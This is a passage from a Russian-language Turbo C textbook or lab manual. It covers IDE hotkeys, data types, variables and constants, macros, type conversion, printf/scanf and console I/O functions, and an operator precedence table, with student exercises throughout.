сохранение параметров среды разработки
Debug
отладчик интегрированной среды
Break/watch
точки останова остановки программ и окно просмотра изменяющихся значений
1.4.3. Основные команды среды разработки (горячие клавиши)
Приведены в табл. 1.2.
Таблица 1.2.
Команда
Назначение
Общие команды
F10
Вход в меню
ESC
Выход в редактор
Alt+F9
Компиляция
^F9
Компоновка
Alt+F5
Просмотр окна исполнения программы
F5
Развернуть/свернуть текущее окно
F6
Перейти к следующему окну
^PgUp
Перейти к началу файла
^PgDn
Перейти к концу файла
Alt+X
Выход из среды разработки
Команда
Назначение
Файловые команды
F2
Сохранение файлов на диске
F3
Загрузка файла с диска
Alt+F3
Загрузка файла из списка последних 9 файлов
Блочные команды
^K^B
Отметить начало блока
^K^K
Отметить конец блока
^K^C
Вставить блок
^K^V
Перенести блок
^K^Y
Вырезать блок
^K^H
Отменить выделение блока
^K^R
Вставить файл с диска
^K^W
Записать блок на диск
^K^P
Печатать блок на принтере
^Y
Удалить строку
Команды поиска
^Q^F
Поиск
^Q^A
Поиск с заменой
^L
Повторить последний поиск
^Q^[
Поиск парных фигурной скобки { }, квадратной [ ], круглой ( ), угловой < >, комментариев /* */, двойной кавычки « », апострофа ‘ ’
Примечание: Символ ‘^’ обозначает клавишу ‘CTRL’
1.5. Общие требования при написании и оформлении программ
1.5.1. В программах обязательно должны быть следующие элементы:
– комментарии;
– название программы;
– очистка экрана в начале программы, ожидание нажатия клавиши в конце;
– при использовании операторов управления подчиненные операторы записывать со сдвигом вправо.
1.5.2. Отчет по каждой задаче должен содержать:
– исходное условие;
– листинг программы (сама программа на языке СИ);
– алгоритм исполнения программы (если размер исходного текста программы превышает одну страницу, то можно показывать на блок-схеме сгруппированные операторы, но операторы управления должны быть показаны все);
– экран исполнения программы (как мы увидим один из возможных вариантов исполнения программы на экране).
1.6. Задания для решения
1.6.1. Напишите программу, в которой на экран выводятся фамилия, имя, отчество, при этом каждое слово выводится с новой строки.
1.6.2. Измените предыдущую программу таким образом, чтобы текст выводился в центре экрана (в текстовом режиме экран содержит 25 строк, 80 столбцов).
1.6.3. Напишите программу возведения целого числа в квадрат: с клавиатуры вводится целое число, это число умножается само на себя и на экран выводится результат.
1.6.4. Напишите программу расчета суммарного сопротивления параллельно соединенных двух (или трех) сопротивлений (вводятся целые значения сопротивлений, рассчитывается и выдается на экран суммарное значение). Экран исполнения программы должен быть примерно такой:
Введите R1: __
Введите R2: __
Суммарное сопротивление R1||R2: __
1.6.5. По введенным с клавиатуры значениям сопротивления R и приложенного напряжения U программа рассчитывает ток I, протекающий через сопротивление и мощность P, выделяемую на нем. Экран исполнения программы должен быть примерно такой:
Введите R= __
Введите U= __
Расчет тока и мощности:
Ток I= __
Мощность P= __
1.6.6. На основе листинга 1.2 составьте программу, которая выдает одновременно результат деления двух целых чисел (операция '/') и остаток от деления двух целых чисел (операция '%'). Выполните анализ полученной программы – выводится ли дробная часть числа, выполняется ли округление, делятся ли отрицательные числа, делятся ли вещественные числа?
1.6.7. Модифицируйте предыдущую программу для деления вещественных чисел (смените тип данных – вместо int установите float, и спецификации формата – вместо %d установите %f). Выполните анализ полученных при делении чисел – выводится ли дробная часть числа, делятся ли отрицательные числа, делятся ли целые числа?
1.6.8. Напишите программу для ввода комплексного числа в алгебраической форме: вещественной и мнимой частей, и вывода в показательной форме: модуля и аргумента комплексного числа.
Рекомендации при составлении программы. Для использования математических функций (гармонических, показательных, логарифмических и т.д.) в программы на языке Си включается файл <math.h>. Перечень всех математических функций и их описанием можно просмотреть используя контекстную помощь (нажать клавиши Ctrl+F1 на имени включаемого файла <math.h>). Для написания заданной программы необходимо: использовать функцию квадратного корня (функция sqrt). Для ввода вещественных чисел смените тип данных – вместо int установите float, и спецификации формата – вместо %d установите %f).
2. ПЕРЕМЕННЫЕ И КОНСТАНТЫ
Любая программа обрабатывает информацию или данные, в программе можно использовать переменные и константы. Как понятно из названия переменные во время исполнения программы могут изменять свои значения. Эти значения могут изменяться в определенном диапазоне в соответствии с заданным типом данных. Термин константа в общем случае относится к данным, которые не могут быть изменены во время исполнения программы.
2.1. Типы данных
В языке Си можно использовать различные типы данных для хранения и обработки информации. Данные каждого типа могут принимать значения в некотором заранее известном диапазоне. В памяти они занимают определенное количество байт. Таким образом, тип данных - это способ хранения информации в памяти.
В зависимости от реализации языка Си размер и диапазон изменения значений различных типов может меняться. В языке Турбо Си основными типами являются целые числа и вещественные (действительные) числа, иногда называемые числами с плавающей запятой. В таблице 2.1 приведены основные типы данных, доступных для языка ТС.
Основные типы данных языка ТС
Таблица 2.1
Тип данных
Название типа
Размер занимаемой памяти, Байт
Диапазон допустимых значений
char
символ
1
-128... 127
unsigned char
беззнаковый символ
1
0...255
int
целое
2
-32768...32767
unsigned int
беззнаковое целое
2
0...65535
long
длинное целое
4
-2147483648... 2147483647
unsigned long
беззнаковое длинное целое
4
0...4294967295
float
вещественное
4
(3,4*10-38…3,4*1038)
double
вещественное двойной точности
8
(1,7*10-308…1,7*10308)
long double
длинное вещественное двойной точности
10
±(3,4*10-4932... 3.4*104932)
Типы данных char, int u long являются типами для хранения целых чисел. Действительно любой символ связан с целым числом – кодом этого символа по так называемой таблице символов ASCII. Этот символ необходим для идентификации нажатой на клавиатуре клавиши или при выводе на принтер.
Различие между целыми типами данных со знаком и без него (модификатор unsigned) состоит в том, как преобразуется старший бит целого числа. Для знакового числа старший бит определяет знак числа - если си равен нулю - число положительное, если равен единице - число отрицательное-
Типы float, double и long double являются типами данных для представления чисел с плавающей запятой.
2.2. Переменные
Переменная - это область памяти, имеющая имя и предназначенная для хранения меняющихся данных определенного типа,
Прежде чем использовать переменную в программе, необходимо объявить её. Для этого указывается тип данных, а затем имя переменной. В общем виде объявление переменной выполняется таким образом:
<ТипДанных> <ИмяПеременной>;
Например,
int i; /* объявление целой переменной i */
int j,n=5,k1,k2; /* объявление 4 целых переменных,
инициализация одной из них */
long g=10; /* объявление переменной g типа длинное целое и инициализация её начальным значением 10*/
float a, b=3.14, с;/* объявление 3 вещественных переменных а, b, с, инициализация начального значения b */
k1=2*n+1;
k2=3*j;
Как видно из примера, в одной строке можно объявить сразу несколько переменных одного типа. Имена (идентификаторы) переменных перечисляются через запятую. Объявление переменных должно заканчиваться точкой с запятой.
Вместе с объявлением переменной, ей можно присвоить начальное значение - этот процесс называется инициализацией. Переменные, которые объявлены, но не инициализированы, содержат случайные значения. Так, в выше приведенном примере после объявления переменных выполнены расчеты значений переменных k1 и k2. После расчета k1 будет иметь определенное значение и равно 11, значение же переменной k2 произвольное, так как в выражении значение переменной j неопределенно.
2.3. Имена переменных
Идентификаторы могут содержать буквы верхнего и нижнего регистров латинского алфавита:
A, B, C, ..., Z, a, b, c, ..., z ,
символ подчеркивания:
_
а также цифры:
0, 1, 2 ..., 9.
Нельзя в имени использовать русские буквы, специальные символы, знаки препинания, пробелы. Обязательным также является следующее условие: имя не должно начинаться с цифры.
Максимально допустимая длина имени переменной различается в зависимости от реализации языка. Язык ТС различает первые 32 символа имени переменной, хотя длина может быть и большей. Еще одной особенностью является то, что имена переменных, написанные строчными и прописными буквами, определяются компилятором ТС как различные, например идентификаторы:
NUM Num num
определяют три различные переменные. При написании программ на языке Си стараются придерживаться следующего правила объявления имен переменных - имя записывается с использованием строчных букв (в отличие от констант, записываемых прописными буквами). Это облегчает чтение и понимание программ. Ниже приведены варианты правильно записанных и неверных именах переменных
Правильные имена
Неправильные имена
first
первый
massiv1
1massiv
hot_key
hot-key
you_and_me
you.and.me
number_5
number№5
printf
if
Два последних примера неправильных имен показывают, что нельзя в именах использовать ключевые слова языка ( if ) и названия функций ( printf ).
Кроме этого, хорошим стилем написания программы считается использование понятных имен переменных. Например, если в программе используется переменная «режим экрана», то можно конечно использовать имя m или r, но более наглядным будет имя mode_screen или rejim_ekran. К тому же при объявлении переменных желательно использовать в тексте программы комментарии, раскрывающие назначение введенных переменных.
2.4. Локальные и глобальные переменные. Область видимости переменной
В языке Си имеет очень важное значение имеет место в программе, в котором происходит объявление переменной. Это определяет область существования переменной (эту область называют областью видимости). Программа не будет компилироваться, если не описать все используемые переменные.
Различают локальные и глобальные переменные. Локальные переменные существуют и в теле функции или оператора управления. Локальные переменные на языке Си (но не С++) объявляются в начале блока – после открывающей фигурной скобки. Только после этого можно использовать их имена в выражениях и операторах. Область видимости локальной переменной – до соответствующей закрывающей фигурной скобки.
Глобальные переменные объявляются вне функций и существуют от точки объявления до конца программы. Соответственно, значение глобальной переменной можно использовать во любом месте программы.
Рассмотрим пример
#include <stdio.h>
int i=1; /* объявление и инициализация глобальной переменной */
float f; /* объявление глобальной переменной */
void fun(void); /* прототип функции пользователя */
void main(void)
{
int k,n; /* объявление локальных переменных */
float g1; /* объявление локальной переменной */
...
}
void fun(void) /* описание функции пользователя */
{
int j=5; /* объявление локальной переменной */
char ch; /* объявление локальной переменной */
...
}
В программе объявлены глобальные и локальные переменные, а также помимо функции main() используется подпрограмма fun(). Глобальные переменные i и f можно использовать в обеих функциях. Значения локальных переменных r, n и g1 можно использовать только в теле функции main(), а переменных j и ch – в теле функции fun().
2.5. Константы
В языке Си представляют собой постоянные параметры, константы, которые не изменяются в ходе исполнения программ. Константы могут быть для любого типа данных. Примеры констант приведены в табл. 2.2.
Пример констант различных типов данных
Таблица 2.2.
Имя константы
Тип
Примеры
символ
char
’A’ ‘ч’ ‘\n’
целое
int
10 -9345 32000
длинное целое
long
100000 5L
вещественное двойной точности
double
3.14 1.23456789 –8.9е-40
2.5.1. Константы типа символ
Можно задавать в двух формах в виде отдельного символа, который записывается в одиночных кавычках ('А ') или в виде целого числа (55). При этом необходимо помнить, что константы, например, '0' и 0 описывают различные данные.
В языке Си существуют символьные константы, обозначающие специальные управляющие символы, такие как: перевод строки, звуковой сигнал, горизонтальная табуляция. Эти символы нельзя ввести с клавиатуры. Для их использования вначале записывается символ '\' – обратный слеш. Например, символ, означающий перевод строки, описывается так: '\n', горизонтальная табуляция – '\t'. Перечень основных специальных символов приведен в таблице 2.3.
Специальные символы
Таблица 2.3.
Обозначение
Назначение
\n
перевод строки
\r
возврат каретки
\t
горизонтальная табуляция
\v
вертикальная табуляция
\b
стирание символа, возврат на шаг
\f
перевод страницы
\”
двойная кавычка
\’
апостроф, одиночная кавычка
\\
обратный слеш
\0
нулевой символ, конец строки
\а
звуковой сигнал
\?
символ вопроса
2.5.2. Целые константы
Эти константы не имеют десятичной точки и порядка числа. В программировании очень часто используются числа, записанные в других системах счисления - двоичной, восьмеричной и шестнадцатеричной. Для двух последних систем в языке Си есть специальная форма записи:
– для восьмеричных целых констант перед числом записывается ноль, и далее используются цифры 0…7;
– для шестнадцатеричных целых констант перед числом устанавливаются два символа 0х и далее используются цифры 0... 9, а также буквы латинского алфавита A, B, C, D, E, F обозначающие соответственно числа от 10 до 15. Примеры целых констант:
восьмеричные: 01 077 012340
шестнадцатеричные: 0х51 0х6А0 0xF59В
2.5.3. Вещественные константы
на языке Си по умолчанию воспринимаются программой как числа типа double. Их можно записать в двух формах:
– в виде числа с десятичной точкой, например, 0.1, 15.189;
– в научном виде (экспоненциальной форме), в котором вместо показателя основания записывается символ Е (или е), например: 1.1Е–10, –5е2 (что эквивалентно математической форме записи чисел 1.110–10 и –5102).
Различие между числами float и double состоит не только в большем диапазоне последних, но и в более точном значении чисел типа double – верными являются 15...16 значащих цифр.
2.6. Макроопределения
Наряду с использованием в тексте программ констант в языке Си существует возможность применения макроопределений (макросов). Макроопределение устанавливает соответствие между именем и определённым значением. Для использования макросов существует несколько предпосылок. Если в программе используется одна и та же константа несколько раз в различных местах программ, то становится желательным использовать соответствующее макроопределение. Другой вариант применения макросов - использование хорошо понимаемых имен.
В общем случае форма записи макроопределения следующая:
#define <ИмяМакроса> <3аменяемоеВыражение>
где <ИмяМакроса> – любое разрешенное имя переменной, при этом желательно использовать заглавные буквы (что облегчает чтение программы). Примеры макросов:
#define NUNBER 1OO
#define LEFT 75
#define RIGHT 77
#define ENTER 13
#define SPACE 0x20
#define PI 3.14159
После определения этих макросов в заголовке, в тексте программы можно использовать имена NUMBER, LEFT, RIGHT и т.д. На этапе создания исполняемого файла (точнее в фазе препроцессора, выполняемой до компиляции) происходит замена имен макросов на соответствующие им значения. Например, если в тексте программы встречаются имена NUMBER, то происходит замена этого имени на значение 100.
2.7. Преобразование типов данных
Исходно предполагается, что пользователь правильно использует типы констант и переменных. Что произойдет, если в выражениях присутствуют данные различных типов? В этом случае язык Си выполняет автоматическое приведение типов данных. Например, какое число будет записано в переменной а после инициализации
int а=11.54;
Так как переменная а определяется как переменная целого типа, то дробная часть вещественной константы 11.54 будет отброшена без округления и в ячейке переменной а будет записано целое число 11.
То же самое произойдет, т.е. не будет учитываться дробная часть числа, если исполнить следующие операторы:
float i;
i=1/10;
Это происходит, потому что в начале вычисляется правая часть выражения, а она содержит только целые константы 1 и 10, следовательно, результат тоже будет целое число: 1/10=0, а не 0.1 как ожидалось. Окончательно переменной i будет присвоено значение 0 и это несмотря на то, что она определяется вещественной.
В общем случае при расчете арифметических выражений приведение типов данных в языке Си происходит следующим образом:
1) все переменные типа char преобразуются в тип int, переменные типа float - в тип double.
2) для любой пары операндов (т.е. в результате вычисления, например, суммы или произведения двух чисел) происходит следующее преобразование:
– если хотя бы один из операндов double, то и второй преобразуется в этот тип;
– если хотя бы один из операндов long, то и другой преобразуется в long;
– если хотя бы один из операндов unsigned, то и другой преобразуется в unsigned.
3) конечный результат после операции присваивания приводится к типу переменной в левой части выражения.
Рассмотрим пример вычисления арифметического выражения:
char а=25, b=20;
int i,j,
long k;
double d=l.55;
i=a*b;
k=10000*b;
j = b*d;
printf(“i=%d k=%ld j=%d”,i,k,j);
При вычислении значения переменной i хотя обе переменные имеют тип char и как будто бы результат перемножения должен выйти за максимальные размеры, но по первому правилу обе переменные приводятся к целому типу. В этом случае результат за допустимые пределы не выйдет i=25*20=500. Для второй переменной k целого типа результат выходит за пределы целого, хотя переменная k объявлена типа длинного целого, поэтому результат перемножения будет неверный. Чтобы исправить эту ошибку необходимо строчку переписать следующим образом:
k=(long)10000*b;
Для третьей переменной j результатом перемножения будет вещественное число двойной точности, при присвоении этого результата происходит приведение типа (double)(int) и при этом происходит потеря дробной части полученного произведения. пределы.
2.8. Задания для решения
2.8.1. Составьте программу, в которой объявляются две целые переменные a1 и a2, вещественная переменная b и переменные типа символ c и d. Переменная a2 инициализирована значением 10.
2.8.2. Найдите ошибки в приведенной программе
#include <conio.h>
#include <studio.h>
void main() {
int printf=5; /* объявление целой переменной */
long number-one; объявление переменной типа длинное целое
double f=1e,
scanf=3.14;/* объявление вещественных переменных */
char if_else='a',
red%bull=100;/* объявление переменных типа символ */
unsigned float a=5,
void=1.e-10;;/* объявление вещественных переменных */
getch(); /* ожидание нажатия любой клавиши */
}
2.8.2. Напишите программу, в которой вводится переменная типа символ, она инициализируется значением 125. Прибавьте единицу к переменной и выведите новое значение переменной на экран. Повторите эти операции (увеличения на единицу и вывода на экран) еще 3 раза. Какие значения переменной будут выведены? Объясните результат.
2.8.4. Составьте программу, в которой сообщение "Привет мир" на экран бы выводилось в кавычках.
2.8.5. Запишите в тетради с указанием всех пробелов и созданных новых строк, что будет выведено на экран следующими функциями (символ означает символ пробела):
printf(“Это\nПросто\nСтрока\n\n”);
printf(“H\nE\nL\nL\nO\n”);
printf(“\t\tИванов\n\tПетров\n\Сидоров\n”);
3. ФУНКЦИИ ВВОДА-ВЫВОДА
3.1. Простейшие функции ввода-вывода
Язык Си содержит множество стандартных функции ввода–вывода информации (с клавиатуры, на экран, из файла и в него и т.д.). В данной главе рассматриваются только самые простые функции – ввода информации с клавиатуры и вывода на экран: printf, scanf, cprintf, cscanf, getch. Эти функции определены в стандартной и консольной библиотеках: <stdio.h> и <conio.h>.
3.2. Функция форматированного вывода printf()
3.2.1. Назначение и описание функции
Функция позволяет вывести информация на экран: простые сообщения, значения переменных и специальные символы (перевод строки, горизонтальная табуляция и т.д.). Функция определяется в библиотеке <stdio.h>. Синтаксис функции:
printf(<управляющая строка>, <список переменных>);
где <управляющая строка> - строка, которая может содержать:
а) простые сообщения, выводимые на экран без изменения, эти сообщения могут содержать произвольные символы, в том числе и на русском языке;
б) спецификации формата вывода переменных;
в) специальные символы;
<список переменных> - перечень идентификаторов переменных, значения которых необходимо вывести на экран.
Спецификации формата начинаются с символа %, за которым следует код формата. Перечень основных спецификаций приведен в табл. 3.1.
Таблица 3.1.
Формат спецификации
Назначение
ЦЕЛЫЕ ЧИСЛА
%d
целое десятичное число
%x
целое шестнадцатеричное число
%o
целое восьмеричное число
%u
целое беззнаковое десятичное число
%ld
число типа длинное целое
ВЕЩЕСТВЕННЫЕ ЧИСЛА
%f
вещественное число в формате xx.xxxxxx
%e
вещественное число в научном формате xx.xxxxx e+xx
%g
вещественное число в форматах %f или %e (в какой форме запись будет короче)
%lf
вещественное число двойной точности
ПРОЧЕЕ
%c
символ
%s
строка
%p
указатель
Специальные символы, приведенные в табл. 2.3, можно использовать для создания новой строки, горизонтальной табуляции подачи звукового сигнала и т.д.
Замечание: При использовании функции printf() необходимо быть очень внимательным к соответствию спецификаций форматов в управляющей строке и типов переменных в списке. В противном случае выводимые значения будут существенно отличаться от реальных. Кроме этого, требуется проверять количество вводимых спецификаций и количество переменных в списке – они должны быть равны друг другу.
Примеры:
1) Необходимо вывести на экран сообщение «Значения переменных равны:» и далее текущие значения двух целых переменных a и b, вещественной переменной c. После вывода значения переменных a и b необходимо перевести курсор на новую строку. Эта задача выполняется следующим вызовом функции:
printf(“Значения переменных равны: %d %d\n%f”,a,b,c);
2) Значения двух вещественных переменных x и y, а также символьной переменной symb необходимо вывести на экран в следующем виде (символы … означают, что здесь будет выведено текущее значение переменной):
x=…
y=…
symb=…
т.е. после вывода каждой переменной необходимо выполнить перевод строки. После вывода значений переменных необходимо выдать звуковой сигнал. Эта задача выполняется следующей строкой программы:
printf(“ x=%f\n y=%f\n symb=%c\n\a”,x,y,symb);
3.2.2. Точность и ширина поля вывода
В функции printf() существует возможность задания вывода переменных определенного формата, а именно, можно задавать ширину поля переменных, определять точность вывода вещественных переменных, определять тип выравнивания данных и т.д. В этом случае спецификации формата записывается в такой форме:
%[флаг][ширина].[точность]спецификация
где флаг – тип выравнивания (пусто – выравнивания по правому краю, `–` – выравнивания по левому краю, `+` – всегда печатать знак числа);
ширина – общая длина поля вывода, т.е. общее количество символов при выводе, включая знак и десятичную точку;
точность – количество цифр числа после запятой.
Примеры спецификаций формата:
%12.4f – вывод вещественной переменной с выравниванием по правому краю, общее количество символов при выводе –12 позиций, количество знаков после десятичной точки – 4;
%-+10.0f – вывод вещественной переменной с выравниванием по левому краю и обязательным выводом знака числа, общая длина поля вывода – 10 позиций, знаки после десятичной точки не выводятся;
%08d – вывод целой переменной с выравниванием по правому краю, ширина поля – 8 позиций, слева число дополняется нулями;
%16s – вывод строки, ширина поля вывода – 16 позиций.
3.3. Функция форматированного ввода scanf()
3.3.1. Назначение и описание функции
Функция позволяет ввести информация с клавиатуры. Функция определяется в библиотеке <stdio.h>. Синтаксис:
scanf(<управляющая строка>, <список адресов переменных>);
где <управляющая строка> - строка, которая может содержать только спецификации формата, перечень допустимых значений спецификаций тот же самый, что и для функции printf() (см. табл. 3.1.);
<список адресов переменных> – содержит перечисленные через запятую адреса переменных, вводимых функцией. Адрес переменной указывается символом & и далее идет идентификатор переменной, например, адрес переменной flag обозначается символами &flag. Для массивов и строк указывать символ & не обязательно.
Замечание: При использовании функции scanf() в управляющей строке нежелательно использовать никаких лишних символов (даже пробелов), кроме спецификаций. Нельзя использовать и специальные символы.
Примеры:
1) Ввести с клавиатуры переменные population и age типов длинное целое и вещественное число:
scanf(“%ld%f”, &population, &age);
2) Ввести с клавиатуры целую переменную kod в шестнадцатеричном формате, строку name и вещественную переменную двойной точности precision:
scanf(“%x%s%lf”, &kod, name, &precision);
При вводе нескольких переменных разделителями между ними являются клавиши пробела, табуляции и ENTER.
3.3.2. Пример 3.1
Рассмотрим программу, в которой вычисляется значение функции y=sin(x) для двух введенных с клавиатуры значений аргумента. При этом вывод на экран необходимо выполнить в виде следующей таблицы (ширина поля каждой переменной 8 позиций, точность – 4 знака):
x
y
xx.xxxx
xx.xxxx
xx.xxxx
xx.xxxx
Листинг 3.1
/* Программа вычисления функции y=sin(x) */
#include <stdio.h>
#include <math.h>
void main()
{
float x1,x2,y1,y2;
printf(“введите два значения аргумента:\n”);
scanf(“%f%f”,&x1,&x2);
printf(“\n| x | y |”);
printf(“\n|––––––––|––––––––|\n”);
y1=sin(x1);
y2=sin(x2);
printf(“|%8.4f|%8.4f|\n”,x1,y1);
printf(“|%8.4f|%8.4f|\n”,x2,y2);
}
3.4. Функции консольного ввода-вывода cscanf() и cprintf()
Консольная библиотека <conio.h> имеет очень похожие функции ввода-вывода. Отличие состоит в том, что с помощью консольных функций можно задать атрибуты вводимых/выводимых символов: задать положение курсора, изменить цвета фона и символов. Поэтому, например, не имеет смысла использовать некоторые специальные символы при выводе данных на экран (перевод строки, горизонтальная табуляция и т.п.). Синтаксис функций cscanf() и cprintf() идентичен аналогичным функциям библиотеки <stdio.h>.
3.4.1. Вспомогательные функции консольной библиотеки
Рассмотрим вспомогательные «полезные» функциями консольной библиотеки, используемые вместе с функциями ввода-вывода:
1) очистка экрана
clrscr();
2) задание нового текущего положения курсора на экране
gotoxy(x,y);
где x, y – координаты нового положения курсора, диапазоны возможных изменения координат следующие x=1…80, y=1…25, координате (1,1) соответствует верхний левый угол экрана;
3) изменение текущего цвета символов (в текстовом режиме):
textcolor(c);
где c – цвет символов (с=0…15 или цвета в виде макроопределения, например, BLACK, BLUE, GREEN, RED,…YELLOW, WHITE);
4) изменение текущего звена фона под символами (в текстовом режиме):
textbackground(c);
где c – цвет фона (с=0…7 или цвета в виде макроопределения, например, BLACK, BLUE, …LIGHTGRAY);
3.4.2. Пример 3.2
Создадим программу ввода фамилии в окне. С помощью консольных функций необходимо выполнить следующие операции: очистить экран дисплея, в центре экрана вывести изображение окна (цветная рамка с желтым цветом символов и синим цветом фона) размером 20 столбцов на 3 строки, ввести строку в пределах окна.
Листинг 3.2
/* Рисование окна и ввод фамилии */
#include <conio.h>
void main()
{
char name[15];/*объявление массива символов для ввода строки*/
clrscr(); /* очистка экрана */
textcolor(YELLOW); /* задание цвета символов */
textbackground(BLUE); /* задание цвета фона */
gotoxy(30,11); /* задание положения курсора */
cprintf(“┌────────────────────┐”);
gotoxy(30,12);
cprintf(“│ Введите фамилию │”);
gotoxy(30,13);
cprintf(“│ │”);
gotoxy(30,14);
cprintf(“└────────────────────┘”);
textcolor(CYAN); /* задание цвета символов */
gotoxy(35,13);
cscanf(“%s”,name); /* ввод строки */
}
Примечание: для ввода программы необходимы символы псевдографики. При их вводе можно использовать коды символов:
218 ┌ 196 ─ 191 ┐
179 │ 179 │
192 └ 196 ─ 217 ┘
3.5. Функция ввода одиночного символа getch()
Функции scanf() и cscanf() требуют аккуратного ввода данных с клавиатуры, незначительная ошибка при вводе информации приводит к сбоям в работе программ. В добротных программах используется посимвольный ввод данных с помощью функции getch(), определяемую в той же библиотеке <conio.h>. Эта функция имеет два варианта применения:
а) для остановки программы до нажатия произвольной клавиши, например, перед ее завершением. В этом случае листинг программы может быть таким
{
…
getch(); /* Ожидание ввода произвольной клавиши */
}
б) получение кода ASCII нажатой клавиши. Для получения кода клавиши необходимо объявить целую переменную и присвоить результат исполнения функции getch() этой переменной. При этом синтаксис использования функции может быть следующим:
{
int i;
…
i=getch(); /* Ожидание нажатия клавиши и присвоение
ее кода символа переменной i */
…
}
3.5.1. Пример 3.3
Написать программу, принимающую символ с клавиатуры и выдающую его код на экран
Листинг 3.3
/* программа вывода на экран кода нажатой клавиши */
#include <conio.h>
void main()
{
int kod; /* объявление переменной */
clrscr(); /* очистка экрана */
cprintf(“Нажмите клавишу: ”); /* вывод сообщения */
kod=getch(); /* ввод клавиши */
cprintf(“\nКод клавиши: %d\n”); /* вывод кода клавиши */
getch(); /* ожидание нажатия
произвольной клавиши */
}
3.6. Задание для самостоятельной работы
3.6.1. Записать отдельные строки программы, используя функции форматированного ввода-вывода:
а) вывод на экран двух переменных типа символ, целой переменной в восьмеричном формате и переменной типа длинное целое (идентификаторы выбрать самостоятельно);
б) вывод на экран значения переменных типа строка (массив символов) family, name, gruppa в следующем виде (после символов … должны идти значения указанных переменных):
Фамилия: …
Имя: …
Группа: …
в) вывести на экран две вещественные переменные в заданном формате: 10 позиций общая ширина поля переменной, 3 позиции – точность;
г) ввод двух переменных типа беззнаковое целое first и second;
д) ввод целой переменной x в шестнадцатеричном формате, вещественной переменной y и вещественной переменной двойной точности z;
е) выполнить ввод вещественных переменных power, moment и velocity, используя функции ввода-вывода в следующем формате (после символов … должен идти ввод указанных переменных):
Параметры двигателя:
мощность двигателя – …
момент двигателя – …
скорость двигателя – …
3.6.2. Записать отдельные строки программы, используя только функции консольного ввода-вывода:
а) очистить экран и далее вывести в центре экрана значения двух целых переменных
a и b, изменив при этом цвет символа и фона;
б) вывести значения четырех вещественных переменных a, b, c и d в следующем виде (ширина поля каждой переменной – 8 позиций, точность – 0 позиций):
a= …
b=…
c=…
d=…
в) выполнить предыдущий пример, но совмещенный с вводом значений этих переменных.
3.6.3. Написать программу: выполняется очистка экрана, вводится вещественное число, на экран выводится корень из введенного числа (функция корня находится в математической библиотеке и вызывается так: y=sqrt(x); ). Вывод корня выполнить в следующем формате – выравнивание по левому краю, общая ширина поля – 10 позиций, точность – 2 символа после десятичной точки.
3.6.4. Составить программу, в которой: выполняется очистка экрана, рисуется на экране изображение окна, внутри окна выполняется ввод трех параметров двигателя (см. задачу 3.6.1,е).
4. ОСНОВНЫЕ ОПЕРАЦИИ ЯЗЫКА
4.1. Операции языка Си
В языке существует большое количество операций (операторов). С помощью операций языка выполняются вычисления, сравнения, присваивания, а также ряд специфических задач. Наиболее часто используемые приведены в табл. 4.1. При выполнении операторов учитываются следующие особенности их исполнения:
а) каждой операции соответствует определенное количество операндов:
– унарные операции, имеющие только один операнд, например, операция взятия адреса переменной x запишется так: &x, а операция инкрементирования переменной i: i++;
– бинарные операции, имеющие два операнда, например, простейшие арифметические операции сложения, вычитания и т.д.: a+b или 4*x;
– единственная трехоперандная операция в языке – операция выполнения условия <операнд1> ? <операнд2> : <операнд3>.
б) некоторые операции могут работать только с определенными типами данных, например, побитовые операции применяются только к целым типам данных;
в) в сложных выражениях, содержащих ряд операций, исполнение большинства операций выполняется слева направо, за исключением, унарных операций и операций присваивания. Если необходимо задать строго определенный порядок исполнения выражения можно использовать круглые скобки;
г) в сложных выражениях последовательность исполнения операций определяется их приоритетом (см. крайнюю правую колонку в табл. 4.1, где 1 – наибольший приоритет исполнения операции).
Таблица 4.1.
Опера-ция
Назначение
Пример
Прио-ритет
Первичные операции
[]
индекс массива
x[2][0]=5;
1
()
вызов функции, очередность выполнения
y=sin(6.28*(x+1));
1
.
элемент структуры (прямой доступ)
time.tm_hour=5;
1
->
элемент структуры (косвенный доступ)
time->tm_hour=5;
1
Унарные операции
++
инкремент (увеличение на единицу)
i++
2
––
декремент (уменьшение на единицу)
i––
2
sizeof
размер в байтах
x=sizeof(int);
3
(тип)
преобразование типа
y=(float)5/2;
3
-
унарный минус (изменение знака)
y=-x;
3
*
косвенная адресация
int x=*y;
3
&
взятие адреса
scanf(“%d”,&x);
3
Арифметические операции
*
умножение
20*x
4
/
деление
x/10
4
%
деление по модулю
x%10
4
+
сложение
x+20
5
–
вычитание
40–x
5
Битовые операции
~
побитовое НЕ
y=~x;
3
<<
побитовый сдвиг влево
y=x<<1;
6
>>
побитовый сдвиг вправо
y=x>>1;
6
&
побитовое И
y=x&15;
9
^
побитовое исключающее ИЛИ
y=x^15;
10
|
побитовое ИЛИ
y=x|15;
11
Продолжение таблицы 4.1.
Опера-ция
Назначение
Пример
Прио-ритет
Операции отношения
<
меньше
if (x<6)
7
>
больше
if (x>6)
7
<=
меньше или равно
if (x<=6)
7
>=
больше или равно
if (x>=6)
7
==
равно
if (x==6)
8
!=
не равно
if (x!=6)
8
Логические операции
!
логическое отрицание (операция НЕ)
if (!x)
3
&&
логическое умножение (операция И)
if (x>0 && x<6)
12
||
логическое сложение (операция ИЛИ)
if (x<0 || x>6)
13
Условная операция
?:
при условии
a>b?10;-10
14
Операции присваивания
=
присваивание
x=5
15
*=
присвоение произведения
x*=3
15
/=
присвоение частного
x/=3
15
%=
присвоение остатка
x%=3
15
+=
присвоение суммы
x+=3
15
–=
присвоение разности
x–=3
15
<<=
присвоение левого сдвига
x<<=3
15
>>=
присвоение правого сдвига
x>>=3
15
&=
присвоение И
x&=3
15
^=
присвоение исключающего ИЛИ
x^=3
15
|=
присвоение ИЛИ
x|=3
15
Прочие операции
,
запятая
a=1, b=2;
16
4.2. Арифметические операции
Операции сложения, вычитания, умножения и деления можно использовать ко всем типам данных. Если операнды одного типа, то результат будет того же типа. Например, вычисляя выражение 12/5, так как операнды целые числа, то в результате получим целое число 2 (округление не выполняется). С другой стороны, если рассчитывается выражение 12./5, результатом будет вещественное число 2.4.
Операция деление по модулю используется при необходимости вычисления остатка от деления целых чисел, например, при вычислении выражения 17%3, результатом будет целое число 2.
4.3. Операции присваивания
Эти операторы имеют наименьший приоритет при вычислении выражений, т.е. выполняются в последнюю очередь (за исключением оператора запятая). В языке Си знак равенства означает выполнение операции присваивания. Например, выражение
x=10+3*4;
означает, что вначале вычисляется выражение слева от знака равенства и затем результат присваивается переменной x. Поэтому выражения
x=x+2;
приобретают при программировании строго определенный смысл: вначале вычисляется выражение справа от знака равенства (к старому значению переменной x прибавляется число 2) и затем полученный результат присваивается переменной x.
